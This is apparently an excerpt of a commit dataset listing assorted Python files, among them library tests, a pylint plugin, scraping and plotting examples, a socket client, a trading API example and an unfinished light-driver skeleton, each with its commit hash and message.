NAME = 'ansible'

# Tags containing rc/beta/alpha are pre-releases and are skipped.
bad_tag_re = re.compile(r'(rc|beta|alpha)')

repos = git.Repo(NAME)
tags = [tag.name for tag in repos.tags
    if tag.name.startswith('v') and not bad_tag_re.search(tag.name)]

# Shell templates: check out a tag, then index that checkout under a
# per-version project name.
checkout_cmd = 'cd {name} ; git checkout {tag}'
index_cmd = './manage.py make_index --project={name}-{tag} {name}'

# NOTE(review): `tags[:2]` indexes only the first two versions —
# looks like a debugging limit; confirm before running for real.
for tag in tags[:2]:
    cmd = checkout_cmd.format(name=NAME, tag=tag)
    print '>>>', cmd
    # A non-zero exit from git checkout aborts the whole run.
    if subprocess.call(cmd, shell=True):
        sys.exit(0)
    cmd = index_cmd.format(name=NAME, tag=tag)
    print '>>>', cmd
    out = subprocess.check_output(cmd, shell=True)
    print out
| Python | 0 | |
24e6a8a21ef61edbe00e6af8a1aea274394a23ed | Add a snippet (python/pygtk). | python/pygtk/minimal.py | python/pygtk/minimal.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012 Jérémie DECOCK (http://www.jdhp.org)
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import pygtk
pygtk.require('2.0')
import gtk
def main():
"""Main function"""
window = gtk.Window(gtk.WINDOW_TOPLEVEL)
window.show()
gtk.main()
if __name__ == '__main__':
main()
| Python | 0.000036 | |
08e4f449f0e871f996e9a265fd23a967a0377078 | Add bfx example | quant/example/ex_bfx.py | quant/example/ex_bfx.py | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import time
from quant import config
from quant.api.bitfinex import PrivateClient
client = PrivateClient(key=config.Bitfinex_SUB_API_KEY, secret=config.Bitfinex_SUB_SECRET_TOKEN)
# client = PrivateClient(key=config.Bitfinex_API_KEY, secret=config.Bitfinex_SECRET_TOKEN)
# print(client.ticker('eosbtc'))
# print(client.balances())
amount = '20.0'
price = '0.00015'
symbol = 'eosbtc'
r_id = client.buy(symbol=symbol, amount=amount, price=price)
print(r_id)
if r_id:
time.sleep(1)
client.cancel_order(r_id)
# print(client.cancel_all_orders())
| Python | 0 | |
800639fe381ec502e54a3fbd95241b460bd3e3c3 | add tests for shannon.py | dit/algorithms/tests/test_shannon.py | dit/algorithms/tests/test_shannon.py | from __future__ import division
from nose.tools import *
from dit import Distribution as D, ScalarDistribution as SD
from dit.algorithms import (entropy as H,
mutual_information as I,
conditional_entropy as CH)
def test_H1():
d = SD([1/2, 1/2])
assert_almost_equal(H(d), 1.0)
def test_H2():
assert_almost_equal(H(1/2), 1.0)
def test_H3():
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = D(outcomes, pmf)
assert_almost_equal(H(d, [0]), 1.0)
assert_almost_equal(H(d, [1]), 1.0)
assert_almost_equal(H(d, [0,1]), 2.0)
assert_almost_equal(H(d), 2.0)
def test_H4():
d = SD([1/10]*10)
d.set_base(10)
assert_almost_equal(H(d), 1.0)
def test_I1():
outcomes = ['00', '01', '10', '11']
pmf = [1/4]*4
d = D(outcomes, pmf)
assert_almost_equal(I(d, [0], [1]), 0.0)
def test_I2():
outcomes = ['00', '11']
pmf = [1/2]*2
d = D(outcomes, pmf)
assert_almost_equal(I(d, [0], [1]), 1.0)
def test_I3():
outcomes = ['000', '011', '101', '110']
pmf = [1/4]*4
d = D(outcomes, pmf)
assert_almost_equal(I(d, [0,1], [1,2]), 2.0)
def test_CH1():
outcomes = ['000', '011', '101', '110']
pmf = [1/4]*4
d = D(outcomes, pmf)
assert_almost_equal(CH(d, [0], [1,2]), 0.0)
assert_almost_equal(CH(d, [0,1], [2]), 1.0)
assert_almost_equal(CH(d, [0], [0]), 0.0) | Python | 0 | |
8c1353537d0920d8137d5ea9d22843da67e41d9a | Add string_format pylint plugin. | test/sanity/pylint/plugins/string_format.py | test/sanity/pylint/plugins/string_format.py | # (c) 2018, Matt Martz <matt@sivel.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import sys
import six
import astroid
from pylint.interfaces import IAstroidChecker
from pylint.checkers import BaseChecker
from pylint.checkers import utils
from pylint.checkers.utils import check_messages
from pylint.checkers.strings import parse_format_method_string
_PY3K = sys.version_info[:2] >= (3, 0)
MSGS = {
'E9305': ("Format string contains automatic field numbering "
"specification",
"ansible-format-automatic-specification",
"Used when a PEP 3101 format string contains automatic "
"field numbering (e.g. '{}').",
{'minversion': (2, 6)}),
'E9390': ("bytes object has no .format attribute",
"ansible-no-format-on-bytestring",
"Used when a bytestring was used as a PEP 3101 format string "
"as Python3 bytestrings do not have a .format attribute",
{'minversion': (3, 0)}),
}
class AnsibleStringFormatChecker(BaseChecker):
"""Checks string formatting operations to ensure that the format string
is valid and the arguments match the format string.
"""
__implements__ = (IAstroidChecker,)
name = 'string'
msgs = MSGS
@check_messages(*(MSGS.keys()))
def visit_call(self, node):
func = utils.safe_infer(node.func)
if (isinstance(func, astroid.BoundMethod)
and isinstance(func.bound, astroid.Instance)
and func.bound.name in ('str', 'unicode', 'bytes')):
if func.name == 'format':
self._check_new_format(node, func)
def _check_new_format(self, node, func):
""" Check the new string formatting """
if (isinstance(node.func, astroid.Attribute)
and not isinstance(node.func.expr, astroid.Const)):
return
try:
strnode = next(func.bound.infer())
except astroid.InferenceError:
return
if not isinstance(strnode, astroid.Const):
return
if _PY3K and isinstance(strnode.value, six.binary_type):
self.add_message('ansible-no-format-on-bytestring', node=node)
return
if not isinstance(strnode.value, six.string_types):
return
if node.starargs or node.kwargs:
return
try:
fields, num_args, manual_pos = parse_format_method_string(strnode.value)
except utils.IncompleteFormatString:
return
if num_args:
self.add_message('ansible-format-automatic-specification',
node=node)
return
def register(linter):
"""required method to auto register this checker """
linter.register_checker(AnsibleStringFormatChecker(linter))
| Python | 0 | |
d6d21f6e7b8d2a44ff3406ddc9a050cc17372da8 | Add analyze_nir_intensity tests module | tests/plantcv/test_analyze_nir_intensity.py | tests/plantcv/test_analyze_nir_intensity.py | import cv2
import numpy as np
from plantcv.plantcv import analyze_nir_intensity, outputs
def test_analyze_nir(test_data):
# Clear previous outputs
outputs.clear()
# Read in test data
img = cv2.imread(test_data.small_gray_img, -1)
mask = cv2.imread(test_data.small_bin_img, -1)
_ = analyze_nir_intensity(gray_img=img, mask=mask, bins=256, histplot=True)
assert int(outputs.observations['default']['nir_median']['value']) == 117
def test_analyze_nir_16bit(test_data):
# Clear previous outputs
outputs.clear()
# Read in test data
img = cv2.imread(test_data.small_gray_img, -1)
mask = cv2.imread(test_data.small_bin_img, -1)
_ = analyze_nir_intensity(gray_img=np.uint16(img), mask=mask, bins=256, histplot=True)
assert int(outputs.observations['default']['nir_median']['value']) == 117
| Python | 0.000001 | |
9790fb109d59214ee016750307cd39b2f2780cf7 | solve increment counter | algo/incrementcounter.py | algo/incrementcounter.py | from datetime import datetime, timedelta
from time import sleep
second = timedelta(seconds=1)
day = timedelta(days=1)
class Increment:
def __init__(self):
self.last_second_count = 0
self.last_day_count = 0
self.seconds_now = datetime.now()
self.days_now = datetime.now()
def increment(self):
now = datetime.now()
if (now - self.seconds_now) >= second:
self.last_second_count = 1
self.seconds_now = now
else:
self.last_second_count += 1
if (now - self.days_now) >= day:
self.last_day_count = 1
self.days_now = now
else:
self.last_day_count += 1
def get_events_last_second(self):
return self.last_second_count
def get_events_last_day(self):
return self.last_day_count
i = Increment()
for j in range(100):
sleep(0.01)
i.increment()
print i.get_events_last_day()
print i.get_events_last_second()
| Python | 0.000124 | |
aa2b788c4d0b148ed9881da86de97965311b9cb4 | Add server.py | server.py | server.py | import socket, sys
import datetime
import time, random
TCP_IP = '72.36.65.116'
TCP_PORT = 5005
BUFFER_SIZE = 1024
if len(sys.argv) < 2:
print ("Enter the server id")
sys.exit(1)
while True:
v = random.randint(1, 10)
ts = time.time()
MESSAGE = str(v) + ";" + sys.argv[1] + ";" + datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
s.send(MESSAGE)
s.close()
print (MESSAGE)
time.sleep(5)
| Python | 0.000001 | |
287c659ad35f5036ba2687caf73009ef455c7239 | update example | examples/plot_otda_linear_mapping.py | examples/plot_otda_linear_mapping.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 20 14:31:15 2018
@author: rflamary
"""
import numpy as np
import pylab as pl
import ot
from scipy import ndimage
##############################################################################
# Generate data
# -------------
n = 1000
d = 2
sigma = .1
# source samples
angles = np.random.rand(n, 1) * 2 * np.pi
xs = np.concatenate((np.sin(angles), np.cos(angles)),
axis=1) + sigma * np.random.randn(n, 2)
xs[:n // 2, 1] += 2
# target samples
anglet = np.random.rand(n, 1) * 2 * np.pi
xt = np.concatenate((np.sin(anglet), np.cos(anglet)),
axis=1) + sigma * np.random.randn(n, 2)
xt[:n // 2, 1] += 2
A = np.array([[1.5, .7], [.7, 1.5]])
b = np.array([[4, 2]])
xt = xt.dot(A) + b
##############################################################################
# Plot data
# ---------
pl.figure(1, (5, 5))
pl.plot(xs[:, 0], xs[:, 1], '+')
pl.plot(xt[:, 0], xt[:, 1], 'o')
##############################################################################
# Estimate linear mapping and transport
# -------------------------------------
Ae, be = ot.da.OT_mapping_linear(xs, xt)
xst = xs.dot(Ae) + be
##############################################################################
# Plot transported samples
# ------------------------
pl.figure(1, (5, 5))
pl.clf()
pl.plot(xs[:, 0], xs[:, 1], '+')
pl.plot(xt[:, 0], xt[:, 1], 'o')
pl.plot(xst[:, 0], xst[:, 1], '+')
pl.show()
##############################################################################
# Load image data
# ---------------
def im2mat(I):
"""Converts and image to matrix (one pixel per line)"""
return I.reshape((I.shape[0] * I.shape[1], I.shape[2]))
def mat2im(X, shape):
"""Converts back a matrix to an image"""
return X.reshape(shape)
def minmax(I):
return np.clip(I, 0, 1)
# Loading images
I1 = ndimage.imread('../data/ocean_day.jpg').astype(np.float64) / 256
I2 = ndimage.imread('../data/ocean_sunset.jpg').astype(np.float64) / 256
X1 = im2mat(I1)
X2 = im2mat(I2)
##############################################################################
# Estimate mapping and adapt
# ----------------------------
mapping = ot.da.LinearTransport()
mapping.fit(Xs=X1, Xt=X2)
xst = mapping.transform(Xs=X1)
xts = mapping.inverse_transform(Xt=X2)
I1t = minmax(mat2im(xst, I1.shape))
I2t = minmax(mat2im(xts, I2.shape))
# %%
##############################################################################
# Plot transformed images
# -----------------------
pl.figure(2, figsize=(10, 7))
pl.subplot(2, 2, 1)
pl.imshow(I1)
pl.axis('off')
pl.title('Im. 1')
pl.subplot(2, 2, 2)
pl.imshow(I2)
pl.axis('off')
pl.title('Im. 2')
pl.subplot(2, 2, 3)
pl.imshow(I1t)
pl.axis('off')
pl.title('Mapping Im. 1')
pl.subplot(2, 2, 4)
pl.imshow(I2t)
pl.axis('off')
pl.title('Inverse mapping Im. 2')
| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 20 14:31:15 2018
@author: rflamary
"""
import numpy as np
import pylab as pl
import ot
from scipy import ndimage
##############################################################################
# Generate data
# -------------
n = 1000
d = 2
sigma = .1
# source samples
angles = np.random.rand(n, 1) * 2 * np.pi
xs = np.concatenate((np.sin(angles), np.cos(angles)),
axis=1) + sigma * np.random.randn(n, 2)
xs[:n // 2, 1] += 2
# target samples
anglet = np.random.rand(n, 1) * 2 * np.pi
xt = np.concatenate((np.sin(anglet), np.cos(anglet)),
axis=1) + sigma * np.random.randn(n, 2)
xt[:n // 2, 1] += 2
A = np.array([[1.5, .7], [.7, 1.5]])
b = np.array([[4, 2]])
xt = xt.dot(A) + b
##############################################################################
# Plot data
# ---------
pl.figure(1, (5, 5))
pl.plot(xs[:, 0], xs[:, 1], '+')
pl.plot(xt[:, 0], xt[:, 1], 'o')
##############################################################################
# Estimate linear mapping and transport
# -------------------------------------
Ae, be = ot.da.OT_mapping_linear(xs, xt)
xst = xs.dot(Ae) + be
##############################################################################
# Plot transported samples
# ------------------------
pl.figure(1, (5, 5))
pl.clf()
pl.plot(xs[:, 0], xs[:, 1], '+')
pl.plot(xt[:, 0], xt[:, 1], 'o')
pl.plot(xst[:, 0], xst[:, 1], '+')
pl.show()
##############################################################################
# Mapping Class between images
# ----------------------------
def im2mat(I):
"""Converts and image to matrix (one pixel per line)"""
return I.reshape((I.shape[0] * I.shape[1], I.shape[2]))
def mat2im(X, shape):
"""Converts back a matrix to an image"""
return X.reshape(shape)
def minmax(I):
return np.clip(I, 0, 1)
# Loading images
I1 = ndimage.imread('../data/ocean_day.jpg').astype(np.float64) / 256
I2 = ndimage.imread('../data/ocean_sunset.jpg').astype(np.float64) / 256
X1 = im2mat(I1)
X2 = im2mat(I2)
##############################################################################
# Estimate mapping and adapt
# ----------------------------
mapping = ot.da.LinearTransport()
mapping.fit(Xs=X1, Xt=X2)
xst = mapping.transform(Xs=X1)
xts = mapping.inverse_transform(Xt=X2)
I1t = minmax(mat2im(xst, I1.shape))
I2t = minmax(mat2im(xts, I2.shape))
# %%
##############################################################################
# Plot transformed images
# -----------------------
pl.figure(2, figsize=(10, 7))
pl.subplot(2, 2, 1)
pl.imshow(I1)
pl.axis('off')
pl.title('Im. 1')
pl.subplot(2, 2, 2)
pl.imshow(I2)
pl.axis('off')
pl.title('Im. 2')
pl.subplot(2, 2, 3)
pl.imshow(I1t)
pl.axis('off')
pl.title('Mapping Im. 1')
pl.subplot(2, 2, 4)
pl.imshow(I2t)
pl.axis('off')
pl.title('Inverse mapping Im. 2')
| Python | 0.000001 |
e5f1f2a19ed86106728c4b70b1c4652ee618f918 | add skeleton for light driver | Lights/light_drv.py | Lights/light_drv.py | from threading import Thread
import logging
logger = logging.getLogger("light_drv")
DMX_RED_CHANNEL = 2
DMX_GREEN_CHANNEL = 3
DMX_BLUE_CHANNEL = 4
DMX_WHITE_CHANNEL = 5
DMX_CHANNEL_COUNT = 6 # Did we decide on another number
def init(lightQueue):
global lightThread
lightThread = LightThread(lightQueue)
lightThread.start()
def shutdown():
global lightThread
logger.info("Light driver shutdown()")
if lightThread != None:
logger.info("...Joining flame driver thread")
lightThread.shutdown()
lightThread.join()
lightThread = None
class LightThread(Thread):
def __init__(self, lightQueue):
Thread.__init__(self)
self.lightQueue = lightQueue
self.running = False
self.isConstantLightModeOn = False # Might not even need this if we only want to keep light constant when Noetica isn't moving.
self.initSerial()
self.lightEvents = list()
def start(self):
self.running = True
def shutdown(self):
self.running = False
# either turn lights off, or turn to default
def initSerial(self):
# TODO: Actually get this to work with entec code
self.ser = serial.Serial()
self.ser.baudrate = BAUDRATE
port = False
for filename in os.listdir("/dev"):
if filename.startswith("tty.usbserial"): # this is the ftdi usb cable on the Mac
port = "/dev/" + filename
logger.info("Found usb serial at " + port)
break;
elif filename.startswith("ttyUSB0"): # this is the ftdi usb cable on the Pi (Linux Debian)
port = "/dev/" + filename
logger.info("Found usb serial at " + port)
break;
if not port:
logger.exception("No usb serial connected")
return None
self.ser.port = port
self.ser.timeout = 0
self.ser.stopbits = serial.STOPBITS_ONE
self.ser.bytesize = 8
self.ser.parity = serial.PARITY_NONE
self.ser.rtscts = 0
self.ser.open()
def run(self):
self.running = True
while(self.running):
if not self.isConstantLightModeOn:
if len(self.lightEvents) > 0: # there are poofer events
# pop events off of the list. If the current time is greater than
# the time associated with the event, set up for serial
event = self.lightEvents.pop(0)
currentTime = time.time()
firingTime = event["time"]
if firingTime < currentTime:
if not currentTime - firingTime > 2000: #If it's more than two seconds in the past, ignore it
self.firePoofers(event["bangCommandList"])
else:
self.lightEvents.insert(0, event)
if len(self.lightEvents) > 0: # there are poofer events in the future
waitTime = self.lightEvents[0]["time"] - time.time()
else:
waitTime = PooferFiringThread.TIMEOUT
try:
cmd = self.lightQueue.get(True, waitTime)
logger.debug("Received Message on cmd queue!")
# parse message. If this is a request to do a flame sequence,
# set up poofer events, ordered by time. Event["time"] attribute
# should be current time (time.time()) plus the relative time from
# the start of the sequence
msgObj = json.loads(cmd)
type = msgObj["cmdType"]
logger.debug("message is {}".format(msgObj))
if type == "stop":
self.stopAll()
elif type == "resume":
self.resumeAll()
elif type == "setToConstant":
self.isConstantLightModeOn = True
self.setConstantLight(msgObj)
elif type == "stopConstant":
self.isConstantLightModeOn = False
elif type == "setColorPattern":
self.setColorPattern(msgObj)
except Queue.Empty:
# this is just a timeout - completely expected. Run the loop
pass
except Exception:
logger.exception("Unexpected exception processing command queue!")
def setConstantLight(self, msgObj):
# TODO: set constant light
pass
def setColorPattern(self, msgObj):
# gets passed a color pattern {red:<int>, green:<int>, blue:<int> }
# and does something with it.
| Python | 0 | |
dcca93fbb66e5cd8bf0e0500aca3f187922e8806 | Add in team id spider | scrapy_espn/scrapy_espn/spiders/team_spider.py | scrapy_espn/scrapy_espn/spiders/team_spider.py | import scrapy
class TeamSpider(scrapy.Spider):
name = "team"
start_urls = [
'http://www.espn.com/mens-college-basketball/teams',
]
def parse(self, response):
for conf in response.css('ul'):
for team in conf.css('li'):
yield {
'team':team.css('h5 a::text').extract(),
'id':team.css('h5 a::attr(href)').extract()[0].split('/')[7]
} | Python | 0 | |
4eb6c05df9b8faf4492b23db1ef0e2aee141d24b | test case for tpt | emma2/msm/analysis/api_test.py | emma2/msm/analysis/api_test.py | '''
Created on 18.10.2013
@author: marscher
'''
import unittest
import emma2.msm.analysis.api as api
import numpy as np
class Test(unittest.TestCase):
def testTPT(self):
A = np.ndarray([1, 2, 3], dtype=int)
B = np.ndarray([4, 2], dtype=int)
T = np.ndarray([[ 0.5, 0, 0.5, 0],
[0, 0.5, 0.5, 0],
[1 / 3., 1 / 3., 0, 1 / 3.],
[0, 0, 1, 0]], shape=(4,4), dtype=np.double)
itpt = api.tpt(T, A, B)
print "flux: ", itpt.getFlux()
print "net flux: ", itpt.getNetFlux()
print "total flux: ", itpt.getTotalFlux()
print "forward committor", itpt.getForwardCommittor()
print "backward committor", itpt.getBackwardCommitor()
if __name__ == "__main__":
unittest.main()
| Python | 0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.